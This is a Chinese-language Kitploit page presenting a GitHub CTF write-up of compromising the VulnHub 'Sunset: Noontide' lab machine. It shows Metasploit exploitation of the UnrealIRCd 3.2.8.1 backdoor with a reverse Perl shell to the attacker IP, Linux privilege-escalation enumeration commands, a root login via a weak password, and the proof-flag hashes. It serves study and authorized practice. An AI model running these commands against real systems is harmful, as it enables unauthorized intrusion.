Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
sunset-noontide-pentesting — 描述 对 Sunset: Noontide VulnHub 靶机的专业渗透测试评估,涵盖侦察、服务枚举、CVE-2010-2075 漏洞利用、后渗透、权限提升以及完整系统攻陷。 | Kitploit
工具/GitHubGitHub/zales2004/sunset-noontide-pentesting
权限提升侦察端口扫描漏洞分析漏洞利用后渗透利用网络安全CTF渗透测试

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
学习与教育
红队
实验室与实践
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

描述 对 Sunset: Noontide VulnHub 靶机的专业渗透测试评估,涵盖侦察、服务枚举、CVE-2010-2075 漏洞利用、后渗透、权限提升以及完整系统攻陷。

查看仓库
9小时7分前尚未审核

Sunset: Noontide — 渗透测试

对 Sunset: Noontide 的专业渗透测试评估与 CTF 演练,这是一台来自 VulnHub 的故意存在漏洞的机器。

本项目记录了完整的渗透测试生命周期,包括侦察、服务枚举、漏洞研究、漏洞利用、初始访问、后渗透、权限提升、入侵证明、风险评估、MITRE ATT&CK 映射以及修复建议。

⚠️ 免责声明: 本次评估是在授权的实验室环境中针对一台故意存在漏洞的机器进行的。本文档中记录的技术和命令仅适用于已获得明确授权的系统。


🎯 目标

  • 识别目标主机
  • 枚举暴露的服务
  • 识别存在漏洞的软件及版本
  • 研究适用的漏洞
  • 利用存在漏洞的服务
  • 获取初始 shell 访问权限
  • 执行 Linux 后渗透枚举
  • 识别权限提升机会
  • 获取 root 级别访问权限
  • 恢复用户和 root 证明文件
  • 记录安全发现
  • 提供修复建议

🖥️ 实验环境

组件详情
目标Sunset: Noontide
平台VulnHub
目标 IP10.106.186.186
目标主机名noontide
目标操作系统Debian GNU/Linux 10 (Buster)
架构x86_64
攻击者平台Kali Linux
攻击者 IP10.106.186.204
评估类型授权实验室评估
总体风险严重
评估结果完全系统沦陷

🔐 攻击链

目标发现 → Nmap 枚举 → 识别 UnrealIRCd 3.2.8.1 → SearchSploit → 识别 CVE-2010-2075 → Metasploit 漏洞利用 → 远程命令 Shell → 以 server 身份获取 Shell → Linux 后渗透 → 弱 Root 凭据 → su root → UID 0 / Root 访问 → 用户与 Root 证明文件


1. 侦察

执行了初始网络发现以识别存在漏洞的目标。

目标最终被识别为:

10.106.186.186

在侦察过程中,10.106.186.142 被识别为默认网关,而非预期目标。

这凸显了在执行进一步安全测试之前正确识别目标的重要性,尤其是在桥接或共享实验室网络中。


2. 服务枚举

使用以下命令对目标执行了 Nmap 服务和版本检测:

nmap -sV 10.106.186.186

评估期间识别出的重要暴露服务为:

6667/tcp open irc UnrealIRCd

随后使用以下命令执行了更详细的扫描:

nmap -sC -sV -Pn -p 6667 10.106.186.186

该服务被识别为:

UnrealIRCd 3.2.8.1

IRC 服务还报告了:

irc.foonet.com

暴露的 UnrealIRCd 服务成为评估期间调查的主要攻击面。


3. 漏洞研究

使用 SearchSploit 调查与所发现的 UnrealIRCd 版本相关的公开记录的漏洞。

命令:

searchsploit UnrealIRCd 3.2.8.1

相关结果为:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

该漏洞被识别为:

CVE-2010-2075

漏洞

UnrealIRCd 3.2.8.1 后门命令执行

严重性

严重

攻击类型

远程命令执行

安全影响

成功利用该存在漏洞的服务允许攻击者在目标系统上远程执行命令。


4. Metasploit 漏洞利用

使用 Metasploit Framework 利用了存在漏洞的 IRC 服务。

所选模块为:

exploit/unix/irc/unreal_ircd_3281_backdoor

示例配置:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

初始 payload 尝试未产生可用会话。

随后选择了兼容的 Unix 反向 Perl payload:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

Metasploit 报告目标似乎存在漏洞,并成功打开了一个命令 shell 会话。


5. 初始访问

使用以下命令验证了所获取的 shell:

whoami

结果:

server

这确认了以 server 账户成功执行远程命令。

初始工作目录为:

/home/server/irc/Unreal3.2

在此阶段,评估从远程服务利用推进到本地后渗透枚举。


6. 后渗透枚举

获取 shell 后,执行了标准 Linux 枚举以了解被入侵的主机并识别潜在的权限提升路径。

当前用户

命令:

id

结果:

uid=1000(server) gid=1000(server)

该账户为非 root 用户。

主机名

命令:

hostname

结果:

noontide

内核信息

命令:

uname -a

结果:

Linux noontide 4.19.0-10-amd64 x86_64

操作系统

命令:

cat /etc/os-release

结果:

Debian GNU/Linux 10 (buster)

这些命令确定了当前身份、主机名、内核版本、操作系统以及一般系统配置。


7. 权限提升枚举

执行了若干标准 Linux 权限提升检查。

7.1 SUID 枚举

命令:

find / -perm -4000 -type f 2>/dev/null

识别出了标准 SUID 二进制文件,如 passwd、chsh、mount、umount、su、chfn、newgrp 和 gpasswd。

未识别出明显的自定义或异常 SUID 二进制文件作为成功的提升途径。


7.2 Sudo 枚举

命令:

sudo -l

从可用输出中未识别出有用的基于 sudo 的权限提升路径。


7.3 Cron 枚举

命令:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

观察到的计划任务为标准的 Debian 风格系统任务。

未识别出明显的可写 root cron 任务。


7.4 可写文件枚举

命令:

find / -writable -type f 2>/dev/null | head -100

初始结果主要是 /proc 伪文件,未揭示实用的权限提升途径。


7.5 Linux Capabilities

命令:

getcap -r / 2>/dev/null

从结果输出中未识别出有用的基于 capability 的权限提升。


8. 权限提升

成功的权限提升路径基于目标机器上配置的故意设置的弱 root 凭据。

使用以下命令访问了 root 账户:

su root

密码:

root

随后使用以下命令验证了 root 访问:

id

结果:

uid=0(root) gid=0(root) groups=0(root)

身份还通过以下命令得到确认:

whoami

结果:

root

这确认了对目标系统的完全管理控制。


9. 入侵证明

9.1 用户级证明

用户级证明文件位于:

/home/server/local.txt

命令:

cat /home/server/local.txt

结果:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 Root 级证明

Root 级证明文件位于:

/root/proof.txt

命令:

cat /root/proof.txt

结果:

ab28c8ca8da1b9ffc2d702ac54221105

Root 证明还返回了:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

两个证明文件的恢复确认了从初始远程访问到 root 级控制的成功沦陷。


10. 风险摘要

ID发现严重性影响
VULN-01UnrealIRCd 3.2.8.1 后门🔴 严重远程命令执行
VULN-02弱 Root 凭据🔴 严重完全管理沦陷

11. 详细发现

VULN-01 — UnrealIRCd 3.2.8.1 后门

严重性: 严重

受影响服务: IRC / TCP 6667

受影响软件: UnrealIRCd 3.2.8.1

CVE: CVE-2010-2075

攻击类型: 远程命令执行

观察到的影​​响: 以 server 身份获取远程 shell

描述

暴露的 UnrealIRCd 服务运行的是与已知后门命令执行漏洞相关的存在漏洞的版本。

该漏洞通过服务枚举和 SearchSploit 研究被识别,并使用 Metasploit 成功利用。

业务影响

能够访问存在漏洞的 IRC 服务的攻击者可以远程执行命令并获得对主机的未授权访问。


VULN-02 — 弱 Root 凭据

严重性: 严重

受影响账户: root

观察到的凭据: root / root

观察到的影​​响: UID 0 管理访问

描述

root 账户配置了极其弱的凭据。

在以 server 身份获取本地 shell 后,使用该弱凭据访问了 root 账户,并以 UID 0 验证。

业务影响

获得本地 shell 访问权限的攻击者可以使用弱 root 凭据获得对操作系统的完全控制。


12. MITRE ATT&CK 映射


13. 修复建议

13.1 移除或升级 UnrealIRCd

将存在漏洞的 UnrealIRCd 安装替换为受信任且受支持的版本。

在部署前验证软件完整性和软件包来源。

13.2 移除被植入后门的软件

如果软件完整性或来源不确定,请使用受信任的安装介质和经过验证的软件包重建系统。

13.3 消除弱凭据

将默认和弱凭据替换为强且唯一的管理凭据。

不要使用诸如 root 之类的简单密码。

13.4 限制 IRC 暴露

如果需要 IRC,请使用以下方式限制访问:

  • 防火墙规则
  • 网络分段
  • VPN 访问
  • 源 IP 限制

13.5 应用安全更新

为操作系统和所有暴露的服务维护有记录的补丁管理流程。

13.6 监控特权访问

记录并审查:

  • 管理身份验证
  • Root 访问
  • 权限变更
  • 可疑身份验证活动

14. 渗透测试方法论


15. 使用的工具

  • Nmap — 网络发现和服务枚举
  • SearchSploit — 漏洞和利用研究
  • Metasploit Framework — 漏洞利用和会话建立
  • Linux 命令行实用程序 — 后渗透和权限枚举

16. 展示的技能

  • 网络侦察
  • 主机发现
  • 端口扫描
  • 服务枚举
  • 版本识别
  • 漏洞评估
  • CVE 研究
  • SearchSploit
  • Metasploit Framework
  • 远程命令执行
  • Linux 枚举
  • SUID 枚举
  • Sudo 枚举
  • Cron 枚举
  • 可写文件枚举
  • Linux Capabilities
  • 凭据安全评估
  • 权限提升
  • 入侵证明
  • MITRE ATT&CK 映射
  • 风险评估
  • 安全报告
  • 修复分析

17. 最终评估

Sunset: Noontide 主机从初始网络访问到完全 root 级控制被成功沦陷。

主要的初始访问漏洞是 UnrealIRCd 3.2.8.1 后门(CVE-2010-2075)。

该漏洞提供了远程命令执行,并导致以 server 账户获得初始 shell。

随后执行了后渗透枚举,包括 SUID、sudo、cron、可写文件、Linux capability、身份、操作系统和文件系统检查。

这些检查未识别出成功的提升途径。

完全管理访问最终通过该机器的弱 root 凭据实现。

用户级和 root 级证明文件的成功恢复确认了完全系统沦陷。

总体评估

严重 — 已实现完全系统沦陷


18. 评估结果


19. 专业渗透测试报告

本项目附有详细的专业渗透测试报告:

Sunset-Noontide-Penetration-Testing-Report.pdf

报告包含:

  • 执行摘要
  • 文档控制
  • 范围和交战规则
  • 风险摘要
  • 攻击路径
  • 侦察
  • 服务枚举
  • 漏洞研究
  • Metasploit 漏洞利用
  • 初始访问
  • 后渗透
  • 权限提升
  • 证据和证明文件
  • 详细发现
  • MITRE ATT&CK 映射
  • 修复建议
  • 最终评估

20. 证据

建议的仓库结构:

sunset-noontide-pentesting/

├── README.md

├── Sunset-Noontide-Penetration-Testing-Report.pdf

└── evidence/

├── 01-target-discovery.png

├── 02-nmap-enumeration.png

├── 03-searchsploit.png

├── 04-metasploit-exploitation.png

├── 05-initial-shell.png

├── 06-post-exploitation.png

├── 07-privilege-escalation.png

└── 08-root-proof.png

截图应仅包含来自授权实验室环境的信息。


21. 经验教训

本次评估提供了以下方面的实践经验:

  1. 在网络环境中正确识别预期目标。
  2. 使用 Nmap 执行服务和版本枚举。
  3. 使用 SearchSploit 研究漏洞。
  4. 选择合适的 Metasploit 利用模块。
  5. 排查 payload 兼容性问题。
  6. 建立远程命令 shell。
  7. 执行 Linux 后渗透枚举。
  8. 系统性地检查常见权限提升途径。
  9. 识别弱管理凭据。
  10. 验证 root 级沦陷。
  11. 收集入侵证明证据。
  12. 以专业渗透测试格式记录漏洞。

22. ⚠️ 法律与道德免责声明

本仓库严格用于:

  • 网络安全教育
  • 授权渗透测试
  • CTF 练习
  • 漏洞研究
  • 实验室环境

本仓库中记录的技术只能针对已获得明确授权的系统执行。

未经许可,请勿对生产系统、公共基础设施或第三方系统使用这些技术。


👨‍💻 作者

Alen Sales K S

Cybersecurity | Penetration Testing | SOC | Network Security

GitHub: https://github.com/zales2004


⭐ 项目摘要

Sunset: Noontide 展示了完整的渗透测试工作流程:

侦察 → 枚举 → 漏洞研究 → 漏洞利用 → 初始访问 → 后渗透 → 权限提升 → Root 访问 → 证据收集 → 风险评估 → 安全报告

评估结果:严重 — 已实现完全系统沦陷

下载工具
技术ID观察到的活动
网络服务扫描T1046Nmap 枚举
利用面向公众的应用程序T1190利用暴露的 UnrealIRCd 服务
命令和脚本解释器T1059远程命令 shell
有效账户T1078使用 root 凭据
账户发现T1087身份和用户枚举
系统信息发现T1082uname 和 /etc/os-release
文件和目录发现T1083文件系统枚举
计划任务/作业发现T1053Cron 枚举
权限组发现T1069id 和组枚举
阶段活动
侦察网络发现和目标识别
枚举Nmap 服务/版本检测
漏洞研究SearchSploit 和 Metasploit 模块识别
漏洞利用UnrealIRCd 后门利用
初始访问以 server 身份获取命令 shell
后渗透身份、操作系统、文件系统和权限枚举
权限提升SUID、sudo、cron、可写文件和 capability 检查
证据收集用户和 root 证明文件
报告发现、风险分析和修复
目标状态
目标已识别✅ 通过
暴露的服务已识别✅ 通过
存在漏洞的版本已识别✅ 通过
CVE 已识别✅ 通过
远程命令执行✅ 通过
以 server 身份获取初始 Shell✅ 通过
用户证明已恢复✅ 通过
权限提升✅ 通过
Root 访问已验证✅ 通过
Root 证明已恢复✅ 通过